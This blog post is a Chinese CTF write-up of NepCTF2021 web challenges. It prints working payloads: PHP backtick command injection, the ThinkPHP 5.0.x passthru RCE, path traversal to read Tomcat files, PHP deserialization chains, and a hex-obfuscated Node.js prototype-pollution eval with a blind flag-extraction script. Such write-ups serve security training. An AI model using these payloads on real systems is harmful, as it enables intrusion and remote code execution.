NepCTF2021-Web部分(除画皮)

最新推荐文章于 2023-08-16 14:29:31 发布
最新推荐文章于 2023-08-16 14:29:31 发布
阅读量3.3k 收藏 13
点赞数 16
分类专栏: 安全学习 # 比赛WP总结 # Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/115097864
版权
安全学习 同时被 3 个专栏收录
210 篇文章 82 订阅
订阅专栏
Web
94 篇文章 21 订阅
订阅专栏
比赛WP总结
16 篇文章 2 订阅
订阅专栏

文章目录

little_trick

打开环境发现代码是这个,太简单了,签到题

<?php
    error_reporting(0);
    highlight_file(__FILE__);
    $nep = $_GET['nep'];
    $len = $_GET['len'];
    if(intval($len)<8 && strlen($nep)<13){
        eval(substr($nep,0,$len));
    }else{
        die('too long!');
    }
?>

这里是利用php反引号执行系统命令的特性解决,有两种解法,我这里只写一个最骚的,这里需要开两次靶机

url?nep=`ls>1`;&len=7
得到
1
index.php
nepctf.php

url/?nep=`>cat`;&len=7
url/?nep=`*>1`;&len=7
这里*>1等价于cat  index.php nepctf.php> 1,linux小trick记住就好,因为linux文件系统默认从数字小写字母到大写字母升序排列

这道题就做完了,没啥难度嘿嘿

faka_revenge

题目给了我们一个附件,下载下来发现是ThinkPHP,那直接全局搜索THINK_VERSION,发现版本是5.0.14这么低不一把嗦?

http://e266f985-936c-4e3e-a4ae-d5ab0a0d6036.node5.hackingfor.fun/?s=index/index
post数据
s=whoami&_method=__construct&method=POST&filter[]=passthru

发现system被禁用了,然后shell_exec没反应
经过本可爱的精心测试,得到passthru没被过滤
因此paylaod为

s=cat /zhangsan*&_method=__construct&method=POST&filter[]=passthru

Easy_Tomcat

首先打开环境以后,发现登录框,根据逻辑猜测得到三个地址

admin.jsp index.jsp register.jsp

我在注册以后发现,猜测存在任意文件读取

username=11&password=1&head_path=static/img/1.png

经过我的测试发现head_path参数前面必须为static/img/并且最多向上穿越两层目录,可是这已经足够了,我们根据javaweb的目录结构(不懂百度),可以直接第一步去拿web.xml文件,多说一句如果可以跳三层我们甚至可以直接拿到war文件Easy_Tomcat.war或者叫ROOT.war这是啥请百度

username=11&password=1&head_path=static/img/../../WEB-INF/web.xml

得到

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>LoginServlet</servlet-name>
        <servlet-class>javademo.LoginServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>RegisterServlet</servlet-name>
        <servlet-class>javademo.RegisterServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>AdminServlet</servlet-name>
        <servlet-class>javademo.AdminServlet</servlet-class>
    </servlet>
    <servlet>
        <servlet-name>InitServlet</servlet-name>
        <servlet-class>javademo.InitServlet</servlet-class>
        <load-on-startup>1</load-on-startup>

    </servlet>
    <servlet-mapping>
        <servlet-name>LoginServlet</servlet-name>
        <url-pattern>/LoginServlet</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>RegisterServlet</servlet-name>
        <url-pattern>/RegisterServlet</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>AdminServlet</servlet-name>
        <url-pattern>/AdminServlet</url-pattern>
    </servlet-mapping>
    <servlet-mapping>
        <servlet-name>InitServlet</servlet-name>
        <url-pattern>/InitServlet</url-pattern>
    </servlet-mapping>
</web-app>

根据javaweb的目录结构我们可以把所有的.class文件下载下来,以及jsp文件下载下来开始审计
放两个参考payload

username=11&password=1&head_path=static/img/../../index.jsp

username=11&password=1&head_path=static/img/../../WEB-INF/classes/javademo/AdminServlet.class

之后我在InitServlet发现了admin的密码

public class InitServlet extends HttpServlet {
  public void init() throws ServletException {
    List<User> list = new ArrayList<>();
    User admin_user = new User();
    admin_user.setUsername("admin");
    admin_user.setPassword("no_one_knows_my_password_75767388428345");
    list.add(admin_user);
    getServletContext().setAttribute("list", list);
  }
}

登陆进入admin.jsp,我之后审计了所有页面无逻辑漏洞,考虑组件本身漏洞,在AdminServlet.java当中发现

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;

接下来无脑试一试fastjson1.2.47漏洞,成功了,我这里不想写太多,我之前也复现了,
见https://blog.csdn.net/solitudi/article/details/114949206?spm=1001.2014.3001.5501的realjvav

之后flag在根目录cat /flag*即可

bbxhh_revenge

非预期

之前flag直接在phpinfo当中,这个页面每访问一次就ban我ip,我节点多,一个一个换发现传image后提示让传 ?nepnep=phpinfo();继续传参,后提示post传HuaiNvRenPaPaPa,构筑payload

http://node4.hackingfor.fun:36474/index.php?nepnep=phpinfo();&imagin=phpinfo();
​
post
HuaiNvRenPaPaPa=1

最后flag存在phpinfo内。

预期

有空做,现在忙着其他事情

梦里花开牡丹亭

首先题目一进去就给了源代码,简单的分析一下

首先是Game类,有个wakeup和destruct方法,里面有个21232f297a57a5a743894a0e4a801fc3,在线解密得到是admin

通过简单分析很容易得出应该是利用shell($content);去执行任意命令,因为waf.txt的存在只能调用file_get_contents函数,因此我们读一下shell.php的

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='shell';
        $this->content='phpinfo();';
        $this->register = 'admin';
        $this->file=new Open();
    }

}
class Open{

}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));

要删除waf.txt只能想到原生类了查找能有删除功能函数,盲猜带open

<?php
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__wakeup',
            '__call',
            '__callStatic',
            'open'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }
}

得到ZipArchive刚好符合,可以删除waf.txt

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;

    public  $file;
    public  $filename;
    public  $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='waf.txt';
        $this->content=8;
        $this->register = 'admin';
        $this->file=new ZipArchive();
    }



}
class Open{

}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));

然后就可以执行任意命令

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;

    public  $file;
    public  $filename;
    public  $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='shell';
        $this->content='ls /';
        $this->register = 'admin';
        $this->file=new Open();
    }



}
class Open{
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
//            shell($content);
        }else{
            echo file_get_contents($filename.".php");
        }
    }
}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));

通过php /flag绕过过滤hhh
或者sh /flag报错信息出flag,还有其他姿势不说了

gamejs

首先看到名字我们不难想到是nodejs,常规套路是拼接source拿到源代码,发现三个路由

app.post('/record', record);
app.get('/', index);
app.get('/source', function (req, res)

然后我一眼看到了最上面有一个merge函数,肯定有原型污染

index页面是那个游戏,没啥好分析的

source页面更不用说了

那就只剩一个record路由了

 var score = req.body.score;

通过post传入数据,配合原型污染用application/json格式的,既然用了json格式,那么下一行的绕过更简单了

score.length < String(highestScore).length

因此我们传入,即可绕过了,其实也可以数组绕过,但是不好配合原型污染

{"score": xxxx, "length": 1}}

之后看下一行,先放在一边

merge(record, {
lastScore:score,
maxScore:Math.max(parseInt(score),record.maxScore),lastTime: new Date().toString()});

再往下,猜测要执行关键函数unserialize,因此必须绕过这个if,不过我们传入的是json数据自带绕过,以为结果是NaN因此直接绕过了

if ((score - highestScore) < 0) {
                var banner = "不好,没有精神!";
            } else {
                var banner = unserialize(serialize_banner).banner;
            }

我们再看unserialize函数这里有一个eval函数可以命令执行

if (validCode(func_code)){
            var d = '(' + func_code + ')';
            obj[key] = eval(d);
          }

再跟踪validCode函数发现只是过滤明文,这里可以十六进制绕过

var validCode = function (func_code){
    let validInput = /subprocess|mainModule|from|buffer|process|child_process|main|require|exec|this|eval|while|for|function|hex|char|base64|"|'|\[|\+|\*/ig;
    return !validInput.test(func_code);
};
var validInput = function (input) {
    let validInput = /subprocess|mainModule|from|process|child_process|main|require|exec|this|function|buffer/ig;
    ins = serialize(input);
    return !validInput.test(ins);
};

因此构造类似这样即可,简单分析可知需要套两层__proto__进去

{"score": {"__proto__": {"__proto__": {"jrxnm": "_$$ND_FUNC$$XXXPAYLAOD"}}, "length": 1}}

因为没有回显,这里采用报错方式配合二分法获得flag

a = '69662870726f636573732e6d61696e4d6f64756c652e726571756972652822667322292e7265616446696c6553796e6328222f6574632f70617373776422292e746f537472696e6728295b305d3e227a22297b7d656c73657b7468726f77204572726f7228297d'
res =""
for i in range(0,len(a),2):
    res += "\\\\x"+a[i:i+2]
print(res)

因此得到

import requests
import time
import string
import json

url = "http://467df204-a224-4b61-8ae6-48637aa91cee.node5.hackingfor.fun/record"


def deco(idx, c):
    p = ''.join(['\\x' + hex(ord(i))[2:] for i in
                 f'if(process.mainModule.require("child_process").execSync("cat /flag").toString()[{idx}]>"{c}"){{}}else{{throw Error()}}']);
    r = {"score": {"__proto__": {"__proto__": {"banner1": "_$$ND_FUNC$$_``.constructor.constructor(`" + p + "`)()"}},
                   "length": 1}}
    return r


flag = ''
for i in range(0, 1000):
    max = 127
    min = 32
    while max >= min:
        # print(str(max)+"-------"+str(min))
        mid = (max + min) // 2
        r = requests.post(url, json=deco(i, chr(mid)))
        if "broke" not in r.text:
            min = mid + 1
        else:
            max = mid
        if max == mid == min:
            flag += chr(mid)
            print(flag)
            break
        if '}' in flag[:-1]:
            exit()
Y4tacker
关注
  • 16
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
[NepCTF]WEB
Huamang的博客
03-23 592
梦里花开牡丹亭 涉及到: pop链 命令执行 短字符命令执行 反序列化,代码审计 <?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register; public $file; public $fi
[Neepuctf2021]wp
Huamang的博客
05-27 381
一个比较小众的比赛,是别学校的招新赛,不过也对外开放 记录一点有点难度的题 随便注2.0 是原题“[强网杯 2019]随便注”的变式,过滤的很多 return preg_match("/select|update|delete|drop|insert|where|rename|set|handler|char|\*| | |\./i",$inject); 空格都可以用%0a绕过,但是rename被ban了,改名不能用了,set被过滤,预处理语句也不能用了,handle也不能用了,网上流传的这三个方法都不行
nepctf2021
SopRomeo的博客
03-25 864
web little_trick 非常简单的命令执行绕过 substr(0,-1)从最后开始过, echo`nl%20*`; 梦里花开牡丹亭 <?php highlight_file(__FILE__); error_reporting(0); include('shell.php'); class Game{ public $username; public $password; public $choice; public $register;
2021NepCTF REVERSE-Hardcsharp Writeup
Nu1bzzi的博客
03-22 411
2021NepCTF REVERSE-Hardcsharp 首先拿到文件第一步用PEiD查壳(养成好习惯) 什么都没找到QAQ,萌新只知道是32位的程序于是顺手放进IDA进行分析 在放入时发现该程序是由.NET做的 进入后点进jmp后的函数果然发现了熟悉的东西 直接放入Dnspy中进行分析(Dnspy的详细使用方法和下载地址在这里????QAQ) 一个个点开之后发现我们要分析的主要函数在@02000002中 而我们需要注意的是这部分的运算 由for循环函数可知array[]数组中每一项都与51做了
NepCTF 2022 Web
qq_43756333的博客
07-22 954
解密sqlmap目录下准备好的so文件,导出hex值,可以用mysql select load_file,也可以用010editor进行导出,我这直接用工具导了。并且注意到提交$query语句提交到后端执行的是multi_query函数,也就是支持多语句执行,因此,这里的考点为二次注入+堆叠注入。udf提权一般三个条件,plugin目录,有insert和delete权限,然后就是配置文件secure_file_priv为空。这里迷了一下,开始疑惑为啥五个问题要用6个占位,后来看了下init.sql。
购物-vapee画皮网团购 v1.3.zip
09-16
"购物支付"部分暗示了应用不仅支持浏览商品,还支持在线支付功能,可能包括但不限于支付宝、微信支付等多种常见的移动支付方式。 详细知识点: 1. **Android应用开发**:Vapee画皮网团购应用是基于Android操作系统...
延迟平衡器:用于平衡器Web ui的Nginx
02-05
正好最近在看Django框架,尝试自己给Nginx画皮,项目诞生!非专业开发,代码凑合看吧。 项目基于 + 构建,在Ubuntu 18.04上测试通过;为了保证良好的兼容性,请使用Chrome浏览器。 为了后续扩展方便,请大家使用替代...
画皮下的罪恶
08-19
画皮下的罪恶
画皮2台词.doc
09-16
画皮2台词.doc
电视剧画皮的经典台词.pdf
12-03
《电视剧画皮》是一部融合了爱情、奇幻与人性探讨的作品,其经典台词揭示了许多深刻的道理。以下是其中一些关键知识点: 1. **道德伦理**:剧中多次提到“有妇之夫”与“狐狸精”的关系,反映了传统道德观念对...
neo-php:Neo区块链PHP包装器
05-28
新PHP 用于NEO区块链PHP SDK 概述 目前正在做什么 通过Composer安装 打开,创建和加密未加密的钱包 创建并打开加密的钱包 最少的NEP-5交互(请求代币余额和智能合约参数工厂) 所有RPC功能都已集成。 地址验证 它包含一个冷钱包生成器 Coinmarketcap API集成 它会(应该)做什么 对以下项目进行钱包交易:NEO,GAS和NEP-5令牌 建立,部署和运行智能合约 多很多 文献资料 目前,除了本自述文件以外,没有太多的文档资料。 我们可以使用它! 如果您想帮助我们,请进行公关:)。 寻求帮助或给予帮助 如果遇到,请打开一个新问题。 或在上ping @Deanpress或@Woodehh 。 拉请求欢迎。 您可以提供有关钱包功能,编写测试或文档或其他您认为很棒的功能的帮助。 入门 要开始使用neo-php,您需要安装 。 准备好打开终端后,输入:
[NepCTF2022] 复现
qq_61768489的博客
07-19 829
www.zip源码泄露,啥也不懂没注意正确的入口在哪里,一直把注意力放在web.php上面。附件下载后是个osz后缀,当时用010看是压缩包文件头,就改后缀了。当时写的过程,确实9.12.2的版本也是用网上流传的9.1.8的链子可以打,右下角有个车牌琼,写的时候都没发现,尚德源茶定位到三亚发现正好是这里。顽皮的HRP又换了种语言写项目来欢迎大家,没想到又让Sharun掘了。目前没学过java,所以跟着wp走一遍,也是网上的链子打。java的框架,给了jar,反编译。binwalk分离图片。...
NepCTF2021一些web题目的总结与复现
feng的博客
03-23 3880
前言 参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,
[WMCTF2021]Make PHP Great Again And Again
feng的博客
10-27 541
前言 也是很久之前WMCTF2021Web的一道题目,当时一点头绪都没有,然后也没有复现,今天晚上跟着赵总的博客进行了学习,也是学习到了非常多的东西。本文只是跟着赵总的博客进行了一波复现,记录下来,仅此而已。 题目环境 题目本身给了shell,但是有着诸多的限制,包括disable_functions,open_basedir,flag文件是700等。 而且不出网,流量是nginx转发进内网。 考虑到是nginx+php-fpm,联想到之前蓝帽杯的那题,很正常会想到利用ftp的被动模式攻击fpm实现恶意加
NepCTF2023】复现
最新发布
leekos的博客,分享web安全相关知识~
08-16 4296
复现完这题学到了很多关于内网中代理等知识,学到了venom工具构造socks5代理,使用proxifier的方式打开工具,有点像给系统加了一个代理。
vnctf2021 web复现
weixin_50597969的博客
04-04 331
vnctf2021 web复现Ez_game 由于本人是个大菜鸡,比赛就签了个到,尝试来复现一下,对应题目在buu上[传送门] Ez_game 解法一:在控制台中输入 winTimer["endTime"]=99 解法二: 发现game.js中有这部分可疑字符串 是sojson.v4加密,在线解密传送门 可以在线解密也可以直接在控制台里边跑 flag flag{this_game_is_funny!} 想玩出来的话,我记得flag好像是在第10关,可以直接修改cookie进入第10关,我t
Linux Shell学习--awk命令详解
weixin_33948416的博客
09-08 283
(1)、awk介绍awk是由Alfred Aho 、Peter Weinberger 和 Brian Kernighan于1977年开发的变成语言,awk是上述三位创建者姓的首字母。Awk的基本语法与c语言类似,如果对c语言很熟悉,那么学习awk编程也将事半功倍。Awk功能与sed相似,都是用来进行文本处理的,awk语言可以从文件或字符串中基于指定规则浏览和抽取信息,在抽取信...
[红明谷CTF 2021]JavaWeb
feng的博客
10-30 1656
前言 在复现强网拟态的那题Java,原来是今年红明谷的原题,所以到buuctf上复现了一下,熟悉一下攻击的流程,之后学习具体的技术细节。 WP 首先进入页面一看到那个500页面就知道是Spring或者SpringBoot了(还是不太了解,之后再去好好学学)。访问/login会提示/json,再访问/json又会302返回/login,很明显是需要登录得了,传点东西: username=1&password=1 提示登录失败,但是cookie里带了rememberMe=deleteMe;,是个shi
a.定义一个Star类(明星类),包含初始化init方法: 成员属性:明星姓名 ​ 明星的电影 成员方法:playing() ​ 打印:“xxx出演了yyy,非常好看” 打印对象时显示“xxx是我的偶像,我非常喜欢他的电影yyy” 删除对象提示“xxx我不再喜欢了” xxx为明星姓名,yyy是电影的名字 b.键盘循环输入五个Star对象的姓名和电影名。 c.分别调用输入Star对象的playing方法和打印对象
04-19
a. 代码如下: ```python class Star: ...陈坤是我的偶像,我非常喜欢他的电影画皮 ``` 删除对象: ```python del stars[0] del stars[2] ``` 输出结果: ``` 周星驰我不再喜欢了 黄渤我不再喜欢了 ```
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值